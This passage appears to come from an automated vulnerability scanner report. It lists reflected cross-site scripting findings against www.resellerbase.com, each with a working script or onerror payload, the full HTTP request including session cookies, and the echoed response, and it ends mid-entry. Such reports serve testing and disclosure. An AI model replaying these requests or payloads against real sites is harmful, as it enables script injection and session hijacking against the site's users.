The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d9e89<script>alert(1)</script>bd99e59cad58d4767 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tagd9e89<script>alert(1)</script>bd99e59cad58d4767/domain+names?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/domain+names
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:55:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagd9e89<script>alert(1)</script>bd99e59cad58d4767/domain+names?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4242. http://www.resellerbase.com/tag/domain+names [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/domain+names

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload d7fb3</title><img%20src%3da%20onerror%3dalert(1)>6ee2bfa9c03a46bb2 was submitted in the REST URL parameter 2. This input was echoed as d7fb3</title><img src=a onerror=alert(1)>6ee2bfa9c03a46bb2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/domain+namesd7fb3</title><img%20src%3da%20onerror%3dalert(1)>6ee2bfa9c03a46bb2?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/domain+names
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9830

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: domain namesd7fb3</title><img src=a onerror=alert(1)>6ee2bfa9c03a46bb2</title>
...[SNIP]...

2.4243. http://www.resellerbase.com/tag/domain+names [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/domain+names

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload b1d85</title><img%20src%3da%20onerror%3dalert(1)>835b97560d1 was submitted in the REST URL parameter 2. This input was echoed as b1d85</title><img src=a onerror=alert(1)>835b97560d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/domain+namesb1d85</title><img%20src%3da%20onerror%3dalert(1)>835b97560d1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 21:28:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9818

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: domain namesb1d85</title><img src=a onerror=alert(1)>835b97560d1</title>
...[SNIP]...

2.4244. http://www.resellerbase.com/tag/domain+names [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/domain+names

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ac8b2<img%20src%3da%20onerror%3dalert(1)>8ed4ae53cda was submitted in the REST URL parameter 2. This input was echoed as ac8b2<img src=a onerror=alert(1)>8ed4ae53cda in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/domain+namesac8b2<img%20src%3da%20onerror%3dalert(1)>8ed4ae53cda HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 21:28:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: domai
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : domain namesac8b2<img src=a onerror=alert(1)>8ed4ae53cda]</td>
...[SNIP]...

2.4245. http://www.resellerbase.com/tag/domain+names [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/domain+names

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 25ebc<img%20src%3da%20onerror%3dalert(1)>115a8b38d8442b0a1 was submitted in the REST URL parameter 2. This input was echoed as 25ebc<img src=a onerror=alert(1)>115a8b38d8442b0a1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/domain+names25ebc<img%20src%3da%20onerror%3dalert(1)>115a8b38d8442b0a1?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/domain+names
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9814

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: domai
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : domain names25ebc<img src=a onerror=alert(1)>115a8b38d8442b0a1]</td>
...[SNIP]...

2.4246. http://www.resellerbase.com/tag/domains [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/domains

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c95a3<script>alert(1)</script>9f262bdf37c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagc95a3<script>alert(1)</script>9f262bdf37c/domains HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/reseller-targetdomain-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagc95a3<script>alert(1)</script>9f262bdf37c/domains was not found on this server.</p>
...[SNIP]...

2.4247. http://www.resellerbase.com/tag/domains [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/domains

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 32a8b<script>alert(1)</script>1bf9a392d2e3594ca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag32a8b<script>alert(1)</script>1bf9a392d2e3594ca/domains?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/domains
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:59:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag32a8b<script>alert(1)</script>1bf9a392d2e3594ca/domains?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4248. http://www.resellerbase.com/tag/domains [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/domains

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 73f38</title><img%20src%3da%20onerror%3dalert(1)>47dddb5e290424c01 was submitted in the REST URL parameter 2. This input was echoed as 73f38</title><img src=a onerror=alert(1)>47dddb5e290424c01 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/domains73f38</title><img%20src%3da%20onerror%3dalert(1)>47dddb5e290424c01?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/domains
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:00:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9820

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: domains73f38</title><img src=a onerror=alert(1)>47dddb5e290424c01</title>
...[SNIP]...

2.4249. http://www.resellerbase.com/tag/domains [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/domains

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bbec2<img%20src%3da%20onerror%3dalert(1)>b71ea305362 was submitted in the REST URL parameter 2. This input was echoed as bbec2<img src=a onerror=alert(1)>b71ea305362 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/domainsbbec2<img%20src%3da%20onerror%3dalert(1)>b71ea305362 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/reseller-targetdomain-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9792

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: domai
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : domainsbbec2<img src=a onerror=alert(1)>b71ea305362]</td>
...[SNIP]...

2.4250. http://www.resellerbase.com/tag/domains [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/domains

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload a11ac</title><img%20src%3da%20onerror%3dalert(1)>13508ca6bb3 was submitted in the REST URL parameter 2. This input was echoed as a11ac</title><img src=a onerror=alert(1)>13508ca6bb3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/domainsa11ac</title><img%20src%3da%20onerror%3dalert(1)>13508ca6bb3 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/reseller-targetdomain-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: domainsa11ac</title><img src=a onerror=alert(1)>13508ca6bb3</title>
...[SNIP]...

2.4251. http://www.resellerbase.com/tag/domains [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/domains

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9d2c8<img%20src%3da%20onerror%3dalert(1)>3abe119967d4f7e4c was submitted in the REST URL parameter 2. This input was echoed as 9d2c8<img src=a onerror=alert(1)>3abe119967d4f7e4c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/domains9d2c8<img%20src%3da%20onerror%3dalert(1)>3abe119967d4f7e4c?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/domains
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9804

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: domai
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : domains9d2c8<img src=a onerror=alert(1)>3abe119967d4f7e4c]</td>
...[SNIP]...

2.4252. http://www.resellerbase.com/tag/downtime+monitor [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/downtime+monitor

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 129e9<script>alert(1)</script>3fe638e6cd2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag129e9<script>alert(1)</script>3fe638e6cd2/downtime+monitor HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/netapplications-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:59:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag129e9<script>alert(1)</script>3fe638e6cd2/downtime+monitor was not found on this server.</p>
...[SNIP]...

2.4253. http://www.resellerbase.com/tag/dripship [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/dripship

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 30b5d<script>alert(1)</script>da86059d89d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag30b5d<script>alert(1)</script>da86059d89d/dripship HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/whitelabeldropshipper-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag30b5d<script>alert(1)</script>da86059d89d/dripship was not found on this server.</p>
...[SNIP]...

2.4254. http://www.resellerbase.com/tag/dropshipper [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/dropshipper

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6a34b<script>alert(1)</script>b36cc29cdc694bc6b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag6a34b<script>alert(1)</script>b36cc29cdc694bc6b/dropshipper?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/dropshipper
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:55:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag6a34b<script>alert(1)</script>b36cc29cdc694bc6b/dropshipper?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4255. http://www.resellerbase.com/tag/dropshipper [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/dropshipper

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a65db<script>alert(1)</script>0231df521ef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /taga65db<script>alert(1)</script>0231df521ef/dropshipper HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /taga65db<script>alert(1)</script>0231df521ef/dropshipper was not found on this server.</p>
...[SNIP]...

2.4256. http://www.resellerbase.com/tag/dropshipper [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/dropshipper

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 202db</title><img%20src%3da%20onerror%3dalert(1)>5571f593535b262a was submitted in the REST URL parameter 2. This input was echoed as 202db</title><img src=a onerror=alert(1)>5571f593535b262a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/dropshipper202db</title><img%20src%3da%20onerror%3dalert(1)>5571f593535b262a?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/dropshipper
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9826

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: dropshipper202db</title><img src=a onerror=alert(1)>5571f593535b262a</title>
...[SNIP]...

2.4257. http://www.resellerbase.com/tag/dropshipper [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/dropshipper

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 42668<img%20src%3da%20onerror%3dalert(1)>fdd22197fb41d3b6b was submitted in the REST URL parameter 2. This input was echoed as 42668<img src=a onerror=alert(1)>fdd22197fb41d3b6b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/dropshipper42668<img%20src%3da%20onerror%3dalert(1)>fdd22197fb41d3b6b?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/dropshipper
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: drops
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : dropshipper42668<img src=a onerror=alert(1)>fdd22197fb41d3b6b]</td>
...[SNIP]...

2.4258. http://www.resellerbase.com/tag/dropshipper [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/dropshipper

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 110b0</title><img%20src%3da%20onerror%3dalert(1)>3ba171cd952 was submitted in the REST URL parameter 2. This input was echoed as 110b0</title><img src=a onerror=alert(1)>3ba171cd952 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

